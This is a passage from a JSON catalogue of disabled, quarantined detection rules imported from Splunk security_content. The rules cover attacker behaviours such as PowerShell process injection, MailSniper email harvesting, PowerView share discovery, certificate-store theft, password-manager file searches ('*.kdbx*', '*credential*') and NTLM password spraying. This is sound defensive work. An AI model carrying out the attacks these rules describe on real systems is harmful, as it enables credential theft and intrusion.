"detections/splunk-imports/_quarantine/asl-aws-network-access-control-list-created-with-all-open-ports.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a2625034-c2de-44fc-b45c-7bac9c4a7974", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_network_access_control_list_created_with_all_open_ports.yml" } }, { "id": "splunk-security-content-a26d9db4-c883-11eb-9d75-acde48001122", "type": "detection", "name": "Powershell Fileless Process Injection via GetProcAddress", "description": "The following analytic detects the use of `GetProcAddress` in PowerShell script blocks, leveraging PowerShell Script Block Logging (EventCode=4104). This method captures the full command sent to PowerShell, which is then logged in Windows event logs. The presence of `GetProcAddress` is unusual for typical PowerShell scripts and often indicates malicious activity, as many attack toolkits use it to achieve code execution. If confirmed malicious, this activity could allow an attacker to execute arbitrary code, potentially leading to system compromise. Analysts should review parallel processes and the entire logged script block for further investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-fileless-process-injection-via-getprocaddress.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a26d9db4-c883-11eb-9d75-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_fileless_process_injection_via_getprocaddress.yml" } }, { "id": "splunk-security-content-a27db3c5-1a9a-46df-a577-765d3f1a3c24", "type": "detection", "name": "Windows MSIExec Unregister DLLRegisterServer", "description": "The following analytic detects the use of msiexec.exe with the /z switch parameter, which is used to unload DLLRegisterServer. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs, including command-line arguments. This activity is significant because unloading DLLRegisterServer can be indicative of an attempt to deregister a DLL, potentially disrupting legitimate services or hiding malicious activity. If confirmed malicious, this could allow an attacker to disable security controls, evade detection, or disrupt system functionality, leading to further compromise of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-msiexec-unregister-dllregisterserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a27db3c5-1a9a-46df-a577-765d3f1a3c24", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_msiexec_unregister_dllregisterserver.yml" } }, { "id": "splunk-security-content-a28f0bc3-3400-4a6e-a2da-89b9e95f0d2a", "type": "detection", "name": "Azure AD Privileged Role Assigned", "description": "The following analytic detects the assignment of privileged Azure Active Directory roles to a user. It leverages Azure AD audit logs, specifically monitoring the \"Add member to role\" operation. This activity is significant as adversaries may assign privileged roles to compromised accounts to maintain persistence within the Azure AD environment. If confirmed malicious, this could allow attackers to escalate privileges, access sensitive information, and maintain long-term control over the Azure AD infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-privileged-role-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a28f0bc3-3400-4a6e-a2da-89b9e95f0d2a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_privileged_role_assigned.yml" } }, { "id": "splunk-security-content-a2b1f1ef-221f-4187-b2a4-d4b08ec745f4", "type": "detection", "name": "Windows Vulnerable Driver Loaded", "description": "The following analytic detects the loading of known vulnerable Windows drivers, which may indicate potential persistence or privilege escalation attempts. It leverages Sysmon EventCode 6 to identify driver loading events and cross-references them with a list of vulnerable drivers. This activity is significant as attackers often exploit vulnerable drivers to gain elevated privileges or maintain persistence on a system. If confirmed malicious, this could allow attackers to execute arbitrary code with high privileges, leading to further system compromise and potential data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-vulnerable-driver-loaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a2b1f1ef-221f-4187-b2a4-d4b08ec745f4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_vulnerable_driver_loaded.yml" } }, { "id": "splunk-security-content-a2c8e8f8-18d6-4ad4-acf4-f58903bebe41", "type": "detection", "name": "Windows NirSoft Tool Bundle File Created", "description": "The following analytic detects the creation of files associated with the NirSoft\ntool bundles on Windows endpoints.\nNirSoft is a well-known provider of free, portable utilities that can be used for various system and network tasks. However, threat actors often leverage these tools for malicious purposes, such as credential harvesting, network reconnaissance, and data exfiltration.\nThe detection focuses on the creation of specific NirSoft tool bundle files, which may indicate that an attacker is preparing to use these utilities on a compromised system.\nSecurity teams should investigate any instances of these files being created, especially if they are found in unexpected locations or on systems that should not be using such tools.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-nirsoft-tool-bundle-file-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a2c8e8f8-18d6-4ad4-acf4-f58903bebe41", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_nirsoft_tool_bundle_file_created.yml" } }, { "id": "splunk-security-content-a2f4cc7f-6503-4078-b206-f83a29f408a7", "type": "detection", "name": "Windows Steal Authentication Certificates CS Backup", "description": "The following analytic identifies the backup of the Active Directory Certificate Services (AD CS) store, detected via Event ID 4876. This event is logged when a backup is performed using the CertSrv.msc UI or the CertUtil.exe -BackupDB command. Monitoring this activity is crucial as unauthorized backups can indicate an attempt to steal authentication certificates, which are critical for secure communications. If confirmed malicious, this activity could allow an attacker to impersonate users, escalate privileges, or access sensitive information, severely compromising the security of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-steal-authentication-certificates-cs-backup.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a2f4cc7f-6503-4078-b206-f83a29f408a7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_steal_authentication_certificates_cs_backup.yml" } }, { "id": "splunk-security-content-a3148fad-3734-4b7f-9a71-62f08d39fab1", "type": "detection", "name": "Windows Office Product Spawned MSDT", "description": "The following analytic detects a Microsoft Office product spawning the Windows msdt.exe process. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where Office applications are the parent process. This activity is significant as it may indicate an attempt to exploit protocol handlers to bypass security controls, even if macros are disabled. If confirmed malicious, this behavior could allow an attacker to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-office-product-spawned-msdt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a3148fad-3734-4b7f-9a71-62f08d39fab1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_office_product_spawned_msdt.yml" } }, { "id": "splunk-security-content-a345980a-417d-4ed3-9fb4-cac30c9405a0", "type": "detection", "name": "Windows USBSTOR Registry Key Modification", "description": "This analytic is used to identify when a USB removable media device is attached to a Windows host. In this scenario we are querying the Endpoint Registry data model to look for modifications to the HKLM\\System\\CurrentControlSet\\Enum\\USBSTOR\\ key. Adversaries and Insider Threats may use removable media devices for several malicious activities, including initial access, execution, and exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1200", "T1025", "T1091" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-usbstor-registry-key-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a345980a-417d-4ed3-9fb4-cac30c9405a0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_usbstor_registry_key_modification.yml" } }, { "id": "splunk-security-content-a34aae96-ccf8-4aef-952c-3ea21444444d", "type": "detection", "name": "System Processes Run From Unexpected Locations", "description": "The following analytic identifies system processes running from unexpected locations outside of paths such as `C:\\Windows\\System32\\` or `C:\\Windows\\SysWOW64`. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process paths, names, and hashes. This activity is significant as it may indicate a malicious process attempting to masquerade as a legitimate system process. If confirmed malicious, this behavior could allow an attacker to execute code, escalate privileges, or maintain persistence within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/system-processes-run-from-unexpected-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a34aae96-ccf8-4aef-952c-3ea21444444d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/system_processes_run_from_unexpected_locations.yml" } }, { "id": "splunk-security-content-a34e65d0-54de-4b02-9db8-5a04522067f6", "type": "detection", "name": "O365 Multiple Service Principals Created by User", "description": "The following analytic identifies instances where a single user creates more than three unique OAuth applications within a 10-minute window in the Office 365 environment. It leverages O365 logs from the Unified Audit Log, focusing on the 'Add service principal' operation in Azure Active Directory. This activity is significant as it may indicate a compromised user account or unauthorized actions, potentially leading to broader network infiltration or privilege escalation. If confirmed malicious, this behavior could allow attackers to gain persistent access, escalate privileges, or exfiltrate sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-multiple-service-principals-created-by-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a34e65d0-54de-4b02-9db8-5a04522067f6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_multiple_service_principals_created_by_user.yml" } }, { "id": "splunk-security-content-a360d2b2-065a-11ec-b0bf-acde48001122", "type": "detection", "name": "Get DomainPolicy with Powershell Script Block", "description": "The following analytic detects the execution of the `Get-DomainPolicy` cmdlet using PowerShell Script Block Logging (EventCode=4104). It leverages logs capturing script block text to identify attempts to obtain the password policy in a Windows domain. This activity is significant as it indicates potential reconnaissance efforts by adversaries or Red Teams to gather domain policy information, which is crucial for planning further attacks. If confirmed malicious, this behavior could lead to detailed knowledge of domain security settings, aiding in privilege escalation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-domainpolicy-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a360d2b2-065a-11ec-b0bf-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_domainpolicy_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-a36972c8-b894-11eb-9f78-acde48001122", "type": "detection", "name": "Mailsniper Invoke functions", "description": "The following analytic detects the execution of known MailSniper PowerShell functions on a machine. It leverages PowerShell logs (EventCode 4104) to identify specific script block text associated with MailSniper activities. This behavior is significant as MailSniper is often used by attackers to harvest sensitive emails from compromised Exchange servers. If confirmed malicious, this activity could lead to unauthorized access to sensitive email data, credential theft, and further compromise of the email infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/mailsniper-invoke-functions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a36972c8-b894-11eb-9f78-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/mailsniper_invoke_functions.yml" } }, { "id": "splunk-security-content-a3b3bc96-1c4f-4eba-8218-027cac739a48", "type": "detection", "name": "Windows Password Managers Discovery", "description": "The following analytic identifies command-line activity that searches for files related to password manager software, such as \"*.kdbx*\" and \"*credential*\". It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. This activity is significant because attackers often target password manager databases to extract stored credentials, which can be used for further exploitation. If confirmed malicious, this behavior could lead to unauthorized access to sensitive information, enabling attackers to escalate privileges, move laterally, or exfiltrate critical data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-password-managers-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a3b3bc96-1c4f-4eba-8218-027cac739a48", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_password_managers_discovery.yml" } }, { "id": "splunk-security-content-a3bddf71-6ba3-42ab-a6b2-396929b16d92", "type": "detection", "name": "Linux Composer Privilege Escalation", "description": "The following analytic detects the execution of the Composer tool with elevated privileges on a Linux system. It identifies instances where Composer is run with the 'sudo' command, allowing the user to execute system commands as root. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant because it can indicate an attempt to escalate privileges, potentially leading to unauthorized root access. If confirmed malicious, an attacker could gain full control over the system, execute arbitrary commands, and compromise sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-composer-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a3bddf71-6ba3-42ab-a6b2-396929b16d92", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_composer_privilege_escalation.yml" } }, { "id": "splunk-security-content-a3d1df37-c2a9-41d0-aa8f-59f82d6192a8", "type": "detection", "name": "Okta User Logins from Multiple Cities", "description": "The following analytic identifies instances where the same Okta user logs in from different cities within a 24-hour period. This detection leverages Okta Identity Management logs, analyzing login events and their geographic locations. Such behavior is significant as it may indicate a compromised account, with an attacker attempting unauthorized access from multiple locations. If confirmed malicious, this activity could lead to account takeovers and data breaches, allowing attackers to access sensitive information and potentially escalate their privileges within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-user-logins-from-multiple-cities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a3d1df37-c2a9-41d0-aa8f-59f82d6192a8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_user_logins_from_multiple_cities.yml" } }, { "id": "splunk-security-content-a3f8e2c9-7d4b-4e1f-9c6a-2b5d8f3e1a7c", "type": "detection", "name": "Windows Local LLM Framework Execution", "description": "The following analytic detects execution of unauthorized local LLM frameworks (Ollama, LM Studio, GPT4All, Jan, llama.cpp, KoboldCPP, Oobabooga, NutStudio) and Python-based AI/ML libraries (HuggingFace Transformers, LangChain) on Windows endpoints by leveraging process creation events.\nIt identifies cases where known LLM framework executables are launched or command-line arguments reference AI/ML libraries.\nThis activity is significant as it may indicate shadow AI deployments, unauthorized model inference operations, or potential data exfiltration through local AI systems.\nIf confirmed malicious, this could lead to unauthorized access to sensitive data, intellectual property theft, or circumvention of organizational AI governance policies.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-local-llm-framework-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a3f8e2c9-7d4b-4e1f-9c6a-2b5d8f3e1a7c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_local_llm_framework_execution.yml" } }, { "id": "splunk-security-content-a4214f0b-e01c-41bc-8cc4-d2b71e3056b4", "type": "detection", "name": "Single Letter Process On Endpoint", "description": "The following analytic detects processes with names consisting of a single letter, which is often indicative of malware or an attacker attempting to evade detection. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because attackers use such techniques to obscure their presence and carry out malicious activities like data theft or ransomware attacks. If confirmed malicious, this behavior could lead to unauthorized access, data exfiltration, or system compromise. Immediate investigation is required to determine the legitimacy of the process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/single-letter-process-on-endpoint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a4214f0b-e01c-41bc-8cc4-d2b71e3056b4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/single_letter_process_on_endpoint.yml" } }, { "id": "splunk-security-content-a42f8029-5472-4c33-8943-bb17bb07466a", "type": "detection", "name": "Linux Gdrive Binary Activity", "description": "The following analytic detects the execution of the 'gdrive' tool on a Linux host. This tool allows standard users to perform tasks associated with Google Drive via the command line. This is used by actors to stage tools as well as exfiltrate data. The detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. If confirmed malicious, this could lead to compromise of systems or sensitive data being stolen.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-gdrive-binary-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a42f8029-5472-4c33-8943-bb17bb07466a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_gdrive_binary_activity.yml" } }, { "id": "splunk-security-content-a43ae66f-c410-4b3d-8741-9ce1ad17ddb0", "type": "detection", "name": "Windows Disable or Modify Tools Via Taskkill", "description": "The following analytic identifies the use of taskkill.exe to forcibly terminate processes. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions that include specific taskkill parameters. This activity is significant because it can indicate attempts to disable security tools or disrupt legitimate applications, a common tactic in malware operations. If confirmed malicious, this behavior could allow attackers to evade detection, disrupt system stability, and potentially gain further control over the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-or-modify-tools-via-taskkill.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a43ae66f-c410-4b3d-8741-9ce1ad17ddb0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_or_modify_tools_via_taskkill.yml" } }, { "id": "splunk-security-content-a44c0be1-d7ab-41e4-92fd-aa9af4fe232c", "type": "detection", "name": "Windows File Share Discovery With Powerview", "description": "The following analytic detects the execution of the Invoke-ShareFinder PowerShell cmdlet from PowerView. This detection leverages PowerShell Script Block Logging to identify instances where this specific command is executed. Monitoring this activity is crucial as it indicates an attempt to enumerate network file shares, which may contain sensitive information such as backups, scripts, and credentials. If confirmed malicious, this activity could enable an attacker to escalate privileges or move laterally within the network, potentially compromising additional systems and sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1135" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-file-share-discovery-with-powerview.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a44c0be1-d7ab-41e4-92fd-aa9af4fe232c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_file_share_discovery_with_powerview.yml" } }, { "id": "splunk-security-content-a4c76d0a-56b6-44be-814b-939746c4d406", "type": "detection", "name": "Cisco Secure Firewall - Snort Rule Triggered Across Multiple Hosts", "description": "This analytic identifies Snort intrusion signatures that have been triggered by ten or more distinct internal IP addresses within a one-hour window. It leverages Cisco Secure Firewall Threat Defense logs and focuses on the IntrusionEvent event type to detect activity that may indicate broad targeting or mass exploitation attempts. This behavior is often associated with opportunistic scanning, worm propagation, or automated exploitation of known vulnerabilities across multiple systems. If confirmed malicious, this could represent the early phase of a coordinated attack aiming to gain a foothold on several hosts or move laterally across the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-snort-rule-triggered-across-multiple-hosts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a4c76d0a-56b6-44be-814b-939746c4d406", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___snort_rule_triggered_across_multiple_hosts.yml" } }, { "id": "splunk-security-content-a4d86702-402b-4a4f-8d06-9d61e6c39cad", "type": "detection", "name": "Windows Unusual NTLM Authentication Destinations By User", "description": "The following analytic detects when an unusual number of NTLM authentications is attempted by the same user account against multiple destinations. This activity generally results when an attacker attempts to brute force, password spray, or otherwise authenticate to numerous domain joined Windows devices using an NTLM based process/attack. This same activity may also generate a large number of EventID 4776 events as well.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-ntlm-authentication-destinations-by-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a4d86702-402b-4a4f-8d06-9d61e6c39cad", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_ntlm_authentication_destinations_by_user.yml" } }, { "id": "splunk-security-content-a4e8f3a4-48b2-11ec-bcfc-3e22fbd008af", "type": "detection", "name": "Interactive Session on Remote Endpoint with PowerShell", "description": "The following analytic detects the use of the `Enter-PSSession` cmdlet to establish an interactive session on a remote endpoint via the WinRM protocol. It leverages PowerShell Script Block Logging (EventCode=4104) to identify this activity by searching for specific script block text patterns. This behavior is significant as it may indicate lateral movement or remote code execution attempts by adversaries. If confirmed malicious, this activity could allow attackers to execute commands remotely, potentially leading to further compromise of the network and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/interactive-session-on-remote-endpoint-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a4e8f3a4-48b2-11ec-bcfc-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/interactive_session_on_remote_endpoint_with_powershell.yml" } }, { "id": "splunk-security-content-a4f39755-b1e2-40bb-b2dc-4449c45b0bf2", "type": "detection", "name": "ASL AWS IAM AccessDenied Discovery Events", "description": "The following analytic identifies excessive AccessDenied events within an hour timeframe for IAM users in AWS. It leverages AWS CloudTrail logs to detect multiple failed access attempts from the same source IP and user identity. This activity is significant as it may indicate that an access key has been compromised and is being misused for unauthorized discovery actions. If confirmed malicious, this could allow attackers to gather information about the AWS environment, potentially leading to further exploitation or privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1580" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-iam-accessdenied-discovery-events.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { 